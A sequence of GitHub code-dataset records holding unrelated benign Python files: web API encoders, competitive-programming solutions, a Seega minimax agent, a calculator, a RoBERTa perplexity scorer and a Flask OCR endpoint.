This is used internally when generating JSON from a\n WebAPIEncoder, but can be used in other projects for more specific\n purposes as well.\n \"\"\"\n def __init__(self, encoder, *args, **kwargs):\n super(JSONEncoderAdapter, self).__init__(\n sort_keys=kwargs.pop('sort_keys', True),\n *args, **kwargs)\n self.encoder = encoder\n\n def encode(self, o, *args, **kwargs):\n self.encode_args = args\n self.encode_kwargs = kwargs\n return super(JSONEncoderAdapter, self).encode(o)\n\n def default(self, o):\n \"\"\"Encodes an object using the supplied WebAPIEncoder.\n\n If the encoder is unable to encode this object, a TypeError is raised.\n \"\"\"\n result = self.encoder.encode(o, *self.encode_args,\n **self.encode_kwargs)\n\n if result is None:\n raise TypeError(\"%r is not JSON serializable\" % (o,))\n\n return result\n\n\nclass XMLEncoderAdapter(object):\n \"\"\"Adapts a WebAPIEncoder to output XML.\n\n This takes an existing encoder and adapts it to output a simple XML format.\n \"\"\"\n def __init__(self, encoder, *args, **kwargs):\n self.encoder = encoder\n\n def encode(self, o, *args, **kwargs):\n self.level = 0\n self.doIndent = False\n\n stream = io.StringIO()\n self.xml = XMLGenerator(stream, settings.DEFAULT_CHARSET)\n self.xml.startDocument()\n self.startElement(\"rsp\")\n self.__encode(o, *args, **kwargs)\n self.endElement(\"rsp\")\n self.xml.endDocument()\n self.xml = None\n\n return stream.getvalue()\n\n def __encode(self, o, *args, **kwargs):\n if isinstance(o, dict):\n for key, value in o.items():\n attrs = {}\n\n if isinstance(key, int):\n attrs['value'] = str(key)\n key = 'int'\n\n self.startElement(key, attrs)\n self.__encode(value, *args, **kwargs)\n self.endElement(key)\n elif isinstance(o, (tuple, list)):\n self.startElement(\"array\")\n\n for i in o:\n self.startElement(\"item\")\n self.__encode(i, *args, **kwargs)\n self.endElement(\"item\")\n\n self.endElement(\"array\")\n elif isinstance(o, str):\n self.text(o)\n elif isinstance(o, int):\n self.text(\"%d\" % o)\n elif isinstance(o, float):\n self.text(\"%s\" % o)\n elif isinstance(o, bool):\n if o:\n self.text(\"True\")\n else:\n self.text(\"False\")\n elif o is None:\n pass\n else:\n result = self.encoder.encode(o, *args, **kwargs)\n\n if result is None:\n raise TypeError(\"%r is not XML serializable\" % (o,))\n\n return self.__encode(result, *args, **kwargs)\n\n def startElement(self, name, attrs={}):\n self.addIndent()\n self.xml.startElement(name, attrs)\n self.level += 1\n self.doIndent = True\n\n def endElement(self, name):\n self.level -= 1\n self.addIndent()\n self.xml.endElement(name)\n self.doIndent = True\n\n def text(self, value):\n self.xml.characters(value)\n self.doIndent = False\n\n def addIndent(self):\n if self.doIndent:\n self.xml.ignorableWhitespace('\\n' + ' ' * self.level)\n\n\n_registered_encoders = None\n\n\ndef get_registered_encoders():\n \"\"\"\n Returns a list of registered Web API encoders.\n \"\"\"\n global _registered_encoders\n\n if _registered_encoders is None:\n _registered_encoders = []\n\n encoders = getattr(settings, 'WEB_API_ENCODERS',\n ['djblets.webapi.encoders.BasicAPIEncoder'])\n\n for encoder in encoders:\n encoder_path = encoder.split('.')\n if len(encoder_path) > 1:\n encoder_module_name = '.'.join(encoder_path[:-1])\n else:\n encoder_module_name = '.'\n\n encoder_module = __import__(encoder_module_name, {}, {},\n encoder_path[-1])\n encoder_class = getattr(encoder_module, encoder_path[-1])\n _registered_encoders.append(encoder_class())\n\n return 
_registered_encoders\n","repo_name":"djblets/djblets","sub_path":"djblets/webapi/encoders.py","file_name":"encoders.py","file_ext":"py","file_size_in_byte":7274,"program_lang":"python","lang":"en","doc_type":"code","stars":314,"dataset":"github-code","pt":"34"}
+{"seq_id":"15483934001","text":"# Codeforces 1512A: every value in the list is equal except one; print its 1-based index.\nt = int(input())\nfor _ in range(t):\n    n = int(input())  # n is consumed to keep the input format; the list length is implicit\n    values = list(map(int, input().split()))\n    distinct = list(set(values))\n    # pick the element that occurs exactly once instead of relying on set ordering,\n    # which is arbitrary and made the original version fragile\n    spy = distinct[0] if values.count(distinct[0]) == 1 else distinct[1]\n    print(values.index(spy) + 1)\n","repo_name":"Neloy-SWE/Solving","sub_path":"codeforces/1512A Spy Detected!.py","file_name":"1512A Spy Detected!.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"}
+{"seq_id":"38155076462","text":"from core.player import Player, Color\r\nfrom seega.seega_rules import SeegaRules\r\nfrom copy import deepcopy\r\nfrom seega import SeegaAction\r\nimport random\r\nimport time\r\nimport numpy as np\r\n\r\n######################\r\n# Auxiliars Functions\r\n######################\r\ndef calculate_time(remain_time):\r\n    return min(np.exp(0.03*remain_time)-1, 20)\r\n\r\n\"\"\"\r\nRecursively collect into piece_list every piece connected\r\nto the given piece along rows and columns\r\n\"\"\"\r\ndef list_piece_connections(piece, all_pieces, piece_list):\r\n\r\n    for next_piece in all_pieces:\r\n        if next_piece not in piece_list:\r\n            # check if they are in same row or column\r\n            if (next_piece[0]==piece[0] or next_piece[1]==piece[1]):\r\n                # check if they are close\r\n                if abs(next_piece[0] + next_piece[1] - piece[0] - piece[1])==1:\r\n                    piece_list.append(next_piece)\r\n                    list_piece_connections(next_piece, all_pieces, piece_list)\r\n\r\n\r\n###########\r\n# AI Class\r\n###########\r\n\r\nclass AI(Player):\r\n\r\n    in_hand = 12\r\n    score = 0\r\n    name = \"smart_agent\"\r\n\r\n    def __init__(self, color):\r\n        super(AI, self).__init__(color)\r\n        self.position = color.value\r\n        self.depth = 0\r\n\r\n\r\n    \"\"\"\r\n    How our agent will play at each new state and remaining\r\n    time.\r\n    \"\"\"\r\n    def play(self, state, remain_time):\r\n        # print(\"\")\r\n        # print(f\"Player {self.position} is playing.\")\r\n        # print(\"time remain is \", remain_time, \" seconds\")\r\n\r\n        self.state_dict = {}\r\n        self.remaining_time = calculate_time(remain_time)\r\n        self.start_time = time.time()\r\n\r\n        if len(self.successors(state))==1:\r\n            return self.successors(state)[0][0]\r\n\r\n        if state.phase == 1: # add\r\n            return minimax_search(state, self)\r\n        else:\r\n            self.depth = 2\r\n            time_lapse = 0\r\n\r\n            turn_remaining_time = self.remaining_time - (time.time() - self.start_time)\r\n\r\n            while time_lapse < turn_remaining_time and self.depth < 10:\r\n                start_iteration = time.time()\r\n                new_action = minimax_search(state, self)\r\n                if new_action != None:\r\n                    action = new_action\r\n                end_iteration = time.time()\r\n                time_lapse = end_iteration - start_iteration\r\n                self.depth += 1\r\n                self.state_dict = {}\r\n                turn_remaining_time = self.remaining_time - (time.time()- self.start_time)\r\n\r\n            # print(self.depth, turn_remaining_time, self.remaining_time)\r\n\r\n            return action\r\n\r\n\r\n    \"\"\"\r\n    The successors function must return (or yield) a list of\r\n    pairs (a, s) in which a is the action played to reach the\r\n    state s.\r\n    \"\"\"\r\n    def successors(self, state):\r\n        # #player = state._next_player\r\n        # actions = SeegaRules.get_player_actions(state, self.color.value)\r\n        # SeegaRules.act(s, a, 
self.color.value)\r\n\r\n        next_player = state._next_player\r\n        actions = SeegaRules.get_player_actions(state, next_player)\r\n        successors = list()\r\n\r\n        for a in actions:\r\n            s = deepcopy(state)\r\n            possible_states = SeegaRules.act(s, a, next_player)\r\n            if possible_states:\r\n                successors.append((a, possible_states[0]))\r\n\r\n        if state.phase == 2:\r\n            successors.sort(key=lambda t: self.evaluate(t[1]), reverse=next_player != self.position)\r\n\r\n        return successors\r\n\r\n    \"\"\"\r\n    ** The cutoff function returns true if the alpha-beta/minimax\r\n    search has to stop and false otherwise.\r\n    \"\"\"\r\n    def cutoff(self, state, depth):\r\n        if state in self.state_dict and self.state_dict[state]==[state.score[-1], state.score[1]]: # Redundant state\r\n            return True\r\n        else:\r\n            self.state_dict[state] = [state.score[-1], state.score[1]]\r\n\r\n        if SeegaRules.is_end_game(state):\r\n            return True\r\n        else:\r\n            if state.phase==1 and depth>0:\r\n                return True\r\n            if depth > self.depth:\r\n                return True\r\n            else:\r\n                if time.time() - self.start_time > self.remaining_time:\r\n                    return True\r\n                else:\r\n                    return False\r\n\r\n    \"\"\"\r\n    Return a value corresponding to the number of\r\n    harmless squares\r\n    \"\"\"\r\n    def safety_evaluation(self, state):\r\n        # get board info from state\r\n        dimension = state.board.board_shape\r\n        square = state.board.get_board_state()\r\n\r\n        # initiate verification\r\n        evaluation = 0\r\n        pieces_on_board = state.board.get_player_pieces_on_board(Color(self.position))\r\n\r\n        for piece in pieces_on_board:\r\n            moves = [(piece[0] + a[0], piece[1] + a[1]) for a in [(0, 1), (0, -1), (1, 0), (-1, 0)]\r\n                     if (0 <= piece[0] + a[0] < dimension[0]) and (0 <= piece[1] + a[1] < dimension[1])]\r\n\r\n            for move in moves:\r\n                if square[move[0]][move[1]].value == 0 or square[move[0]][move[1]].value == self.position:\r\n                    evaluation += 1\r\n\r\n        return evaluation\r\n\r\n\r\n    \"\"\"\r\n    Return a value corresponding to how defensively the agent\r\n    should play given a game status\r\n    \"\"\"\r\n    def defensive_evaluation(self, state):\r\n        defensive_coef = 1/8 # how safe the agent plays\r\n        if state.phase == 2:\r\n            score = state.get_player_info(self.position)[\"score\"]\r\n            opp_score = state.get_player_info(self.position*-1)[\"score\"]\r\n            balance = score - opp_score\r\n\r\n            if SeegaRules.is_end_game(state) and balance < 0:\r\n                return float('-inf')\r\n            elif SeegaRules.is_end_game(state) and balance > 0:\r\n                return float('inf')\r\n            else:\r\n                return defensive_coef + defensive_coef * self.safety_evaluation(state)\r\n        else:\r\n            return 0\r\n\r\n    \"\"\"\r\n    Return the number of corner & edge pieces for the given color\r\n    \"\"\"\r\n    def corner_edges(self, state, color):\r\n        dimension = state.board.board_shape\r\n        # board cells are 0-indexed, so the far corners sit at dimension - 1\r\n        max_row, max_col = dimension[0] - 1, dimension[1] - 1\r\n        corners = [(0, 0), (max_row, 0), (0, max_col), (max_row, max_col)]\r\n        corner, edges = 0, 0\r\n\r\n        pieces_on_board = state.board.get_player_pieces_on_board(color)\r\n        for piece in pieces_on_board:\r\n            if piece in corners:\r\n                corner += 1\r\n            elif piece[0] == 0 or piece[0] == max_row:\r\n                edges += 1\r\n            elif piece[1] == 0 or piece[1] == max_col:\r\n                edges += 1\r\n        return corner, edges\r\n\r\n    \"\"\"\r\n    return the max number of pieces \"connected\" for a\r\n    given color\r\n    \"\"\"\r\n    def get_conn_pieces_num(self, state, color):\r\n\r\n        all_pieces = state.board.get_player_pieces_on_board(color)\r\n        connected_pieces = list()\r\n        max_connections = 0\r\n\r\n        for piece in all_pieces:\r\n            if piece not in connected_pieces:\r\n                new_connected_pieces = [piece]\r\n                
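# flood-fill every piece reachable from this one through row/column adjacency\r\n                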
list_piece_connections(piece, all_pieces, new_connected_pieces)\r\n                if len(new_connected_pieces) > max_connections:\r\n                    connected_pieces = new_connected_pieces\r\n\r\n        return len(connected_pieces)\r\n\r\n\r\n    \"\"\"\r\n    Return the number of the opponent's possible and\r\n    maximum captures for a given state\r\n    \"\"\"\r\n    def opponent_captures(self, state):\r\n        dimension = state.board.board_shape\r\n        square = state.board.get_board_state()\r\n        opp_color = self.position*-1\r\n        player_color = self.position\r\n        opp_max_cap = 0\r\n        opp_possible_cap = 0\r\n\r\n        opp_pieces_on_board = state.board.get_player_pieces_on_board(Color(self.position*-1))\r\n        for piece in opp_pieces_on_board:\r\n            moves = SeegaRules.get_effective_cell_moves(state, piece)\r\n            if len(moves) > 0:\r\n                move_threat = 0\r\n                for move in moves:\r\n                    # map two-step positions\r\n                    gaps = [(move[0] + a[0], move[1] + a[1]) for a in [(0, 2), (0, -2), (2, 0), (-2, 0)]\r\n                            if (0 <= move[0] + a[0] < dimension[0]) and (0 <= move[1] + a[1] < dimension[1])]\r\n                    # map one-step positions\r\n                    neig = [(move[0] + a[0], move[1] + a[1]) for a in [(0, 1), (0, -1), (1, 0), (-1, 0)]\r\n                            if ((0 <= move[0] + a[0] < dimension[0]) and (0 <= move[1] + a[1] < dimension[1])\r\n                                and ((move[0] + a[0], move[1] + a[1]) != (dimension[0]//2, dimension[1]//2)))]\r\n\r\n                    # note: pairing gaps[i] with neig[i] only matches directions while both\r\n                    # filters keep the same entries; a capture needs an opponent piece two\r\n                    # cells away with one of our pieces in between\r\n                    for i in range(len(moves)):\r\n                        if i < len(gaps) and i < len(neig):\r\n                            if square[gaps[i][0]][gaps[i][1]].value == opp_color and square[neig[i][0]][neig[i][1]].value == player_color:\r\n                                move_threat += 1\r\n                                opp_possible_cap += 1\r\n\r\n                if move_threat > opp_max_cap:\r\n                    opp_max_cap = move_threat\r\n\r\n        return opp_possible_cap, opp_max_cap\r\n\r\n    \"\"\"\r\n    * The evaluate function must return an integer value\r\n    representing the utility function of the board.\r\n    \"\"\"\r\n    def evaluate(self, state):\r\n        evaluate_score = 0\r\n        if state.phase==2:\r\n\r\n            # Defensive index\r\n            defensive_idx = self.defensive_evaluation(state)\r\n\r\n            # Pieces balance\r\n            age_pieces = len(state.board.get_player_pieces_on_board(Color(self.position)))\r\n            opp_pieces = len(state.board.get_player_pieces_on_board(Color(self.position*-1)))\r\n\r\n            # Corners and edges, computed per side (the original passed no color\r\n            # and so counted the agent's own pieces twice)\r\n            age_corners, age_edges = self.corner_edges(state, Color(self.position))\r\n            opp_corners, opp_edges = self.corner_edges(state, Color(self.position*-1))\r\n\r\n            # Opponent threats\r\n            ## opp_possible_cap = self.opponent_captures(state)[0]\r\n            opp_max_cap = self.opponent_captures(state)[1]\r\n\r\n            # Connected pieces\r\n            age_structure = self.get_conn_pieces_num(state, Color(self.position))\r\n            opp_structure = self.get_conn_pieces_num(state, Color(self.position*-1))\r\n\r\n            evaluate_score += (age_pieces - opp_pieces)*5 # Difference in pieces\r\n            evaluate_score += age_corners*2 # Count corner pieces 3 times in total as they are uncapturable\r\n            evaluate_score += age_edges # Count edge pieces 2 times in total as they are more difficult to capture than center pieces but still capturable\r\n            evaluate_score -= opp_edges # Decrease for opponent edge pieces as if we can capture some it is very good. No decrease for corner pieces as we can not capture them\r\n            evaluate_score -= opp_max_cap # Decrease for direct captures the opponent can make\r\n            evaluate_score += age_structure # Increase for the size of our biggest structure\r\n            evaluate_score -= opp_structure # Decrease for the size of the opponent structure\r\n            evaluate_score += 2 * defensive_idx\r\n\r\n        return evaluate_score\r\n
\r\n    \"\"\"\r\n    Specific methods for a Seega player (do not modify)\r\n    \"\"\"\r\n    def set_score(self, new_score):\r\n        self.score = new_score\r\n\r\n    def update_player_infos(self, infos):\r\n        self.in_hand = infos['in_hand']\r\n        self.score = infos['score']\r\n\r\n    def reset_player_informations(self):\r\n        self.in_hand = 12\r\n        self.score = 0\r\n\r\n\r\n\r\n\"\"\"\r\nMiniMax and AlphaBeta algorithms.\r\nAdapted from:\r\n    Author: Cyrille Dejemeppe \r\n    Copyright (C) 2014, Universite catholique de Louvain\r\n    GNU General Public License \r\n\"\"\"\r\n\r\ninf = float(\"inf\")\r\n\r\ndef minimax_search(state, player, prune=True):\r\n    \"\"\"Perform a MiniMax/AlphaBeta search and return the best action.\r\n\r\n    Arguments:\r\n    state -- initial state\r\n    player -- a concrete instance of class AI implementing an Alpha-Beta player\r\n    prune -- whether to use AlphaBeta pruning\r\n\r\n    \"\"\"\r\n    def max_value(state, alpha, beta, depth):\r\n        if player.cutoff(state, depth):\r\n            return player.evaluate(state), None\r\n        val = -inf\r\n        action = None\r\n        for a, s in player.successors(state):\r\n            if s.get_latest_player() == s.get_next_player():  # next turn is for the same player\r\n                v, _ = max_value(s, alpha, beta, depth + 1)\r\n            else:  # next turn is for the other one\r\n                v, _ = min_value(s, alpha, beta, depth + 1)\r\n            if v > val:\r\n                val = v\r\n                action = a\r\n            if prune:\r\n                if v >= beta:\r\n                    return v, a\r\n                alpha = max(alpha, v)\r\n        return val, action\r\n\r\n    def min_value(state, alpha, beta, depth):\r\n        if player.cutoff(state, depth):\r\n            return player.evaluate(state), None\r\n        val = inf\r\n        action = None\r\n        for a, s in player.successors(state):\r\n            if s.get_latest_player() == s.get_next_player():  # next turn is for the same player\r\n                v, _ = min_value(s, alpha, beta, depth + 1)\r\n            else:  # next turn is for the other one\r\n                v, _ = max_value(s, alpha, beta, depth + 1)\r\n            if v < val:\r\n                val = v\r\n                action = a\r\n            if prune:\r\n                if v <= alpha:\r\n                    return v, a\r\n                beta = min(beta, v)\r\n        return val, action\r\n\r\n    _, action = max_value(state, -inf, inf, 0)\r\n    return action\r\n","repo_name":"Breno-st/artificial-intelligence","sub_path":"adversarial-search-seega/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":13614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
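minimax_search above is generic over any player object exposing cutoff/evaluate/successors. A toy, self-contained illustration of the same alpha-beta pruning rule on a hard-coded two-level tree — every name here is local to the sketch, not part of the agent:

import math

def alphabeta(node, alpha, beta, maximizing):
    # a node is either a leaf value or a list of child nodes
    if isinstance(node, (int, float)):
        return node
    if maximizing:
        best = -math.inf
        for child in node:
            best = max(best, alphabeta(child, alpha, beta, False))
            alpha = max(alpha, best)
            if beta <= alpha:
                break  # prune: the minimizer will never allow this branch
        return best
    best = math.inf
    for child in node:
        best = min(best, alphabeta(child, alpha, beta, True))
        beta = min(beta, best)
        if beta <= alpha:
            break
    return best

print(alphabeta([[3, 5], [2, 9]], -math.inf, math.inf, True))  # 3 (the 9 is pruned)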
+{"seq_id":"2760578285","text":"import math\r\n\r\nwhile True:\r\n    print(\"\"\"\r\n    *************************\r\n\r\n    1_ Multiply\r\n    2_ Divide\r\n    3_ Add\r\n    4_ Subtract\r\n    5_ Power\r\n    6_ cos(x)\r\n    7_ sin(x)\r\n    8_ tan(x)\r\n    9_ Factorial\r\n    10_ Square root\r\n\r\n    !!! PRESS Q TO QUIT !!!\r\n    *************************\r\n    \"\"\")\r\n    choice = input(\"Please enter the number of the operation you want: \")\r\n    # read the choice as text first so 'q' can quit; the original cast with int()\r\n    # immediately, which made the later comparison against \"q\" unreachable\r\n    if choice.lower() == \"q\":\r\n        break\r\n    try:\r\n        islem = int(choice)\r\n    except ValueError:\r\n        print(\"You pressed a wrong key, try again...\")\r\n        continue\r\n\r\n    if islem == 1:\r\n        a = int(input(\"First number: \"))\r\n        b = int(input(\"Second number: \"))\r\n        print(\"{} x {} = {} \".format(a, b, a*b))\r\n    elif islem == 2:\r\n        a = int(input(\"First number: \"))\r\n        b = int(input(\"Second number: \"))\r\n        print(\"{} / {} = {} \".format(a, b, a / b))\r\n    elif islem == 3:\r\n        a = int(input(\"First number: \"))\r\n        b = int(input(\"Second number: \"))\r\n        print(\"{} + {} = {} \".format(a, b, a + b))\r\n    elif islem == 4:\r\n        a = int(input(\"First number: \"))\r\n        b = int(input(\"Second number: \"))\r\n        print(\"{} - {} = {} \".format(a, b, a - b))\r\n    elif islem == 5:\r\n        a = int(input(\"Base: \"))\r\n        b = int(input(\"Exponent: \"))\r\n        print(\"{} ^ {} = {} \".format(a, b, pow(a, b)))\r\n    elif islem == 6:\r\n        a = int(input(\"Enter the angle: \"))\r\n        print(\"cos{} = {} \".format(a, math.cos(math.radians(a))))\r\n    elif islem == 7:\r\n        a = int(input(\"Enter the angle: \"))\r\n        print(\"sin{} = {} \".format(a, math.sin(math.radians(a))))\r\n    elif islem == 8:\r\n        a = int(input(\"Enter the angle: \"))\r\n        print(\"tan{} = {} \".format(a, math.tan(math.radians(a))))\r\n    elif islem == 9:\r\n        a = int(input(\"Enter the number whose factorial to compute: \"))\r\n        print(\"{}! = {}\".format(a, math.factorial(a)))\r\n    elif islem == 10:\r\n        a = int(input(\"Enter the number whose square root to take: \"))\r\n        print(\"{}^(0.5) = {}\".format(a, math.sqrt(a)))\r\n    else:\r\n        print(\"You pressed a wrong key, try again...\")\r\n\r\n","repo_name":"betulerbay/kodlama_egzersizler_python","sub_path":"Ödevler/Modüller/hesap_makinesi.py","file_name":"hesap_makinesi.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
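The calculator above repeats the two-number prompt in every arithmetic branch; a dispatch-table sketch of the same menu idea using the operator module (an illustrative alternative, not the original design):

import operator

OPS = {1: ('x', operator.mul), 2: ('/', operator.truediv),
       3: ('+', operator.add), 4: ('-', operator.sub), 5: ('^', pow)}

def run_binary_op(choice):
    # look up the symbol and function once, then prompt and apply
    sym, fn = OPS[choice]
    a = int(input("First number: "))
    b = int(input("Second number: "))
    print("{} {} {} = {}".format(a, sym, b, fn(a, b)))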
+{"seq_id":"31907774602","text":"# https://programmers.co.kr/learn/courses/30/lessons/92334?language=python3\nfrom collections import defaultdict, Counter\n\ndef solution(id_list, report, k):\n    answer = []\n\n    total_dict = defaultdict(set)\n    for member in id_list:\n        total_dict[member]\n\n    for rep in report:\n        reporter, reported = rep.split(\" \")\n        total_dict[reporter].add(reported)\n\n    report_cnt = defaultdict(int)\n    for reporter in total_dict:\n        for reported in total_dict[reporter]:\n            report_cnt[reported] += 1\n\n    for reporter in total_dict:\n        cnt = 0\n        for reported in total_dict[reporter]:\n            if reported in report_cnt:\n                if report_cnt[reported] >= k:\n                    cnt += 1\n        answer.append(cnt)\n\n    return answer\n'''\n Test 1 〉\tpassed (0.01ms, 10.3MB)\n Test 2 〉\tpassed (0.02ms, 10.2MB)\n Test 3 〉\tpassed (137.30ms, 44.2MB)\n Test 4 〉\tpassed (0.04ms, 10.2MB)\n Test 5 〉\tpassed (0.04ms, 10.4MB)\n Test 6 〉\tpassed (0.94ms, 10.5MB)\n Test 7 〉\tpassed (1.93ms, 10.6MB)\n Test 8 〉\tpassed (3.22ms, 10.9MB)\n Test 9 〉\tpassed (61.14ms, 26.7MB)\nTest 10 〉\tpassed (59.98ms, 26.3MB)\nTest 11 〉\tpassed (133.68ms, 44.3MB)\nTest 12 〉\tpassed (0.26ms, 10.4MB)\nTest 13 〉\tpassed (0.27ms, 10.4MB)\nTest 14 〉\tpassed (54.25ms, 23.4MB)\nTest 15 〉\tpassed (98.78ms, 38.5MB)\nTest 16 〉\tpassed (0.15ms, 10.3MB)\nTest 17 〉\tpassed (0.25ms, 10.1MB)\nTest 18 〉\tpassed (0.58ms, 10.2MB)\nTest 19 〉\tpassed (0.67ms, 10.4MB)\nTest 20 〉\tpassed (72.92ms, 23.3MB)\nTest 21 〉\tpassed (104.39ms, 38.6MB)\nTest 22 〉\tpassed (0.01ms, 10.2MB)\nTest 23 〉\tpassed (0.01ms, 10.2MB)\nTest 24 〉\tpassed (0.01ms, 10.1MB)\n'''\n\ndef solution2(id_list, report, k):\n    answer = []\n\n    total_dict = defaultdict(set)\n    for member in id_list:\n        total_dict[member]\n\n    for rep in report:\n        reporter, reported = rep.split(\" \")\n        total_dict[reporter].add(reported)\n\n    total_report = []\n    for member, reported in total_dict.items():\n        total_report.extend(list(reported))\n    total_report = dict(Counter(total_report))\n    ban_member = [reported for reported, report_num in total_report.items() if report_num >= k]\n\n    for member in total_dict:\n        cnt = 0\n        for reported in total_dict[member]:\n            if reported in ban_member:\n                cnt += 1\n        answer.append(cnt)\n\n    return answer\n'''\n Test 1 〉\tpassed (0.04ms, 10.2MB)\n Test 2 〉\tpassed (0.04ms, 10.2MB)\n Test 3 〉\tpassed (1158.12ms, 45.7MB)\n Test 4 〉\tpassed (0.06ms, 10.2MB)\n Test 5 〉\tpassed (0.06ms, 10MB)\n Test 6 〉\tpassed (0.96ms, 10.6MB)\n Test 7 〉\tpassed (2.16ms, 10.7MB)\n Test 8 〉\tpassed (3.77ms, 11MB)\n Test 9 〉\tpassed (302.58ms, 27MB)\nTest 10 〉\tpassed (58.97ms, 26.9MB)\nTest 11 〉\tpassed (624.81ms, 45.6MB)\nTest 12 〉\tpassed (0.86ms, 10.3MB)\nTest 13 〉\tpassed (0.30ms, 10.4MB)\nTest 14 〉\tpassed (393.40ms, 23.9MB)\nTest 15 〉\tpassed (112.93ms, 39MB)\nTest 16 〉\tpassed (0.20ms, 10.4MB)\nTest 17 〉\tpassed (0.29ms, 10.3MB)\nTest 18 〉\tpassed (0.71ms, 10.2MB)\nTest 19 〉\tpassed (1.25ms, 10.4MB)\nTest 20 〉\tpassed (359.14ms, 24MB)\nTest 21 〉\tpassed (596.00ms, 39.1MB)\nTest 22 〉\tpassed (0.04ms, 10.1MB)\nTest 23 〉\tpassed (0.03ms, 10.2MB)\nTest 24 〉\tpassed (0.03ms, 10.3MB)\n'''\n\n\nif __name__ == '__main__':\n    input_args = [\n        ([\"muzi\", \"frodo\", \"apeach\", \"neo\"], [\"muzi frodo\", \"apeach frodo\", \"frodo neo\", \"muzi neo\", \"apeach muzi\"], 2),\n        ([\"con\", \"ryan\"], [\"ryan con\", \"ryan con\", \"ryan con\", \"ryan con\"], 3),\n    ]\n    for id_list, report, k in input_args:\n        solution2(id_list, report, k)\n        print()","repo_name":"ljh415/algorithm","sub_path":"programmers/singo.py","file_name":"singo.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"}
+{"seq_id":"36243850249","text":"import torch\nfrom transformers import RobertaForMaskedLM, AutoTokenizer\nfrom autocuda import auto_cuda\n\nfrom entity.instruction import Instruction\n\n\nclass Perplexity(object):\n    def __init__(self, model=\"roberta-base\", device=\"cuda\"):\n        assert model, \"The model must not be None\"\n        self.device = device if device else auto_cuda()\n\n        self.tokenizer = AutoTokenizer.from_pretrained(model)\n        # load the pretrained weights; building the model from a bare config\n        # would leave it randomly initialised and make the scores meaningless\n        self.mlm = RobertaForMaskedLM.from_pretrained(model).to(self.device)\n\n    def calculate_perplexity(self, prompt):\n        inputs = self.tokenizer(\n            str(prompt), return_tensors=\"pt\", truncation=True, padding=True\n        )\n        inputs = inputs.to(self.device)\n        with torch.no_grad():\n            outputs = self.mlm(**inputs, labels=inputs[\"input_ids\"])\n        loss = outputs.loss\n        # the loss is already averaged over tokens, so perplexity is exp(loss);\n        # dividing by the sequence length again would understate it\n        perplexity = torch.exp(loss)\n\n        return perplexity.item()\n\n\nif __name__ == \"__main__\":\n    p = Perplexity(device=\"cpu\")\n    print(p.calculate_perplexity(Instruction(\"hello world\")))\n","repo_name":"yangheng95/InstOptima","sub_path":"objectives/perplexity.py","file_name":"perplexity.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
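Perplexity is the exponential of the mean per-token negative log-likelihood; a tiny numeric illustration of that relationship (the values are invented for the example):

import math

token_nlls = [2.1, 1.7, 2.4]            # per-token negative log-likelihoods
mean_nll = sum(token_nlls) / len(token_nlls)
perplexity = math.exp(mean_nll)
print(round(perplexity, 2))              # exp(2.0666...) ~= 7.9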
+{"seq_id":"10722136222","text":"from flask import request, jsonify\nfrom flask_restx import Resource\nimport numpy as np\nimport base64\nimport json\nimport cv2\nimport imutils\nfrom imutils.contours import sort_contours\nimport requests\n\nfrom sample_project.predict import ns\n\n\n@ns.route('/predicts', methods=['POST'])\nclass Predict(Resource):\n    def post(self):\n        # Decoding and pre-processing base64 image\n        IMAGE_SIZE = (700, 700)\n        # np.fromstring is deprecated for binary data; frombuffer reads the decoded bytes directly\n        img_array = np.frombuffer(base64.b64decode(request.form['b64']), np.uint8)\n        img_array = cv2.imdecode(img_array, cv2.IMREAD_GRAYSCALE)\n        gray = cv2.resize(img_array, IMAGE_SIZE)\n        blurred = cv2.GaussianBlur(gray, (5, 5), 0)\n        edged = cv2.Canny(blurred, 30, 150)\n        cnts = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n        cnts = imutils.grab_contours(cnts)\n        cnts = sort_contours(cnts, method=\"left-to-right\")[0]\n        chars = []\n\n        for c in cnts:\n            (x, y, w, h) = cv2.boundingRect(c)\n\n            if (w >= 20 and w <= 150) and (h >= 60 and h <= 150):\n\n                roi = gray[y:y + h, x:x + w]\n                thresh = cv2.threshold(roi, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n                (tH, tW) = thresh.shape\n\n                if tW > tH:\n                    thresh = imutils.resize(thresh, width=28)\n\n                else:\n                    thresh = imutils.resize(thresh, height=28)\n\n                (tH, tW) = thresh.shape\n                dX = int(max(0, 28 - tW) / 2.0)\n                dY = int(max(0, 28 - tH) / 2.0)\n\n                padded = cv2.copyMakeBorder(thresh, top=dY, bottom=dY,\n                                            left=dX, right=dX, borderType=cv2.BORDER_CONSTANT,\n                                            value=(0, 0, 0))\n                padded = cv2.resize(padded, (28, 28))\n\n                padded = padded.astype(\"float32\") / 255.0\n                padded = np.expand_dims(padded, axis=-1)\n\n                chars.append((padded, (x, y, w, h)))\n\n        chars = np.array([c[0] for c in chars], dtype=\"float32\")\n\n        # Creating body for TensorFlow serving request\n        data = json.dumps({\"signature_name\": \"serving_default\", \"instances\": chars.tolist()})\n        print('Data: {} ... {}'.format(data[:50], data[len(data)-52:]))\n\n        headers = {\"content-type\": \"application/json\"}\n\n        # Making POST request\n        r = requests.post('http://number-model-container.herokuapp.com/v1/models/save_model:predict', data=data, headers=headers)\n\n        # Decoding results from TensorFlow Serving server\n        preds = json.loads(r.content.decode('utf-8'))\n\n        labelNames = \"0123456789\"\n        labelNames = [l for l in labelNames]\n\n        data = []\n\n        for pred in preds['predictions']:\n            i = np.argmax(pred)\n            prob = pred[i]\n            label = labelNames[i]\n            item = {\"character\": label, \"score\": prob * 100}\n            data.append(item)\n\n            print(\"[INFO] {} - {:.2f}%\".format(label, prob * 100))\n\n        return jsonify(data)","repo_name":"jkostanje/ocr_app","sub_path":"sample_project/predict/v1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
